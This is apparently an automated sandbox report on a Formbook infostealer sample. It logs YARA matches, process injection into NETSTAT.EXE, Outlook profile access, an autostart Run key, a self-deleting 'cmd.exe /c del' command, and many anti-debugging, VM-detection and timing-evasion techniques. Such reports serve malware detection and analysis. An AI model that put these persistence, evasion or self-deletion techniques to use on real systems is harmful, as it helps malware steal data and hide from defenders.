Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@14/9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041DDA8 GetLastError,FormatMessageA, 0_2_0041DDA8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00408606 GetDiskFreeSpaceA, 0_2_00408606
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004137F4 FindResourceA, 0_2_004137F4
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: mp0nMsMroT.exe Virustotal: Detection: 47%
Source: mp0nMsMroT.exe ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: unknown Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: wntdll.pdbUGP source: mp0nMsMroT.exe, 00000001.00000002.232510703.0000000000A90000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: mp0nMsMroT.exe, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Unpacked PE file: 1.2.mp0nMsMroT.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004265C8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004482AC push 00448339h; ret 0_2_00448331
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00416038 push ecx; mov dword ptr [esp], edx 0_2_0041603A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045E088 push 0045E0B4h; ret 0_2_0045E0AC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00448244 push 004482AAh; ret 0_2_004482A2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00426224 push 00426250h; ret 0_2_00426248
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004263D0 push 004263FCh; ret 0_2_004263F4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00436418 push 00436444h; ret 0_2_0043643C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00424540 push 0042456Ch; ret 0_2_00424564
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E57C push 0042E5A8h; ret 0_2_0042E5A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E5CC push 0042E60Fh; ret 0_2_0042E607
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00436580 push 004365ACh; ret 0_2_004365A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00428608 push 00428661h; ret 0_2_00428659
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E634 push 0042E677h; ret 0_2_0042E66F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004306C8 push 0043070Ah; ret 0_2_00430702
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004246D8 push 00424704h; ret 0_2_004246FC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E6F0 push 0042E73Bh; ret 0_2_0042E733
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E698 push 0042E6E4h; ret 0_2_0042E6DC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E748 push 0042E774h; ret 0_2_0042E76C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00410736 push 004107AEh; ret 0_2_004107A6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00410738 push 004107AEh; ret 0_2_004107A6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004107B0 push 00410858h; ret 0_2_00410850
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041085A push 00410970h; ret 0_2_00410968
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A8AE push 0041A95Bh; ret 0_2_0041A953
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A8B0 push 0041A95Bh; ret 0_2_0041A953
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00410944 push 00410970h; ret 0_2_00410968
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A960 push 0041A9F0h; ret 0_2_0041A9E8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004069D4 push ecx; mov dword ptr [esp], eax 0_2_004069D5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A9F2 push 0041AD10h; ret 0_2_0041AD08
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00462A60 push 00462A8Ch; ret 0_2_00462A84
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00460AE4 push 00460B24h; ret 0_2_00460B1C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00412ABC push ecx; mov dword ptr [esp], edx 0_2_00412AC1

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run L2KDG

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045BB20 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0045BB20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_0045C240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_0045C2F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004423DC IsIconic,GetCapture, 0_2_004423DC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00424910 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00424910
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00458B48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_00458B48
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00442C90 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_00442C90
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004435B4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 0_2_004435B4
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004265C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00437104 0_2_00437104
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\mp0nMsMroT.exe RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mp0nMsMroT.exe RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002D783D4 second address: 0000000002D783DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002D7876E second address: 0000000002D78774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_0045B090
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00437104 0_2_00437104
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6556 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6184 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00465E48 GetSystemTime followed by cmp: cmp word ptr [ebp-18h], 07dfh and CTI: jnc 00465E6Fh 0_2_00465E48
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408454
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405098
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D7F470
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041E338 GetSystemInfo, 0_2_0041E338
Source: explorer.exe, 00000002.00000000.203152657.0000000007E03000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.187656767.0000000000DB8000.00000004.00000020.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=1
Source: explorer.exe, 00000002.00000000.203817798.000000000812E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.460074157.000000000474A000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.203595823.0000000007FBB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.194401530.00000000047E8000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.196670871.0000000006912000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.203580093.0000000007FAC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.203152657.0000000007E03000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process queried: DebugFlags
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00409910 LdrLoadDll, 1_2_00409910
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00465CEC VirtualProtect ?,0000F9B9,00000104,?,00000000,0000F9B9,00003000,00000004 0_2_00465CEC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004265C8
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF90AF mov eax, dword ptr fs:[00000030h] 1_2_00AF90AF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00AEF0BF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 1_2_00AEF0BF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 1_2_00AEF0BF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9080 mov eax, dword ptr fs:[00000030h] 1_2_00AB9080
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h] 1_2_00B33884
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h] 1_2_00B33884
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB58EC mov eax, dword ptr fs:[00000030h] 1_2_00AB58EC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 1_2_00AB40E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 1_2_00AB40E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 1_2_00AB40E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h] 1_2_00B37016
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h] 1_2_00B37016
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h] 1_2_00B37016
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h] 1_2_00B84015
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h] 1_2_00B84015
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B72073 mov eax, dword ptr fs:[00000030h] 1_2_00B72073
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B81074 mov eax, dword ptr fs:[00000030h] 1_2_00B81074
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h] 1_2_00AD0050
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h] 1_2_00AD0050
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B351BE mov eax, dword ptr fs:[00000030h] 1_2_00B351BE
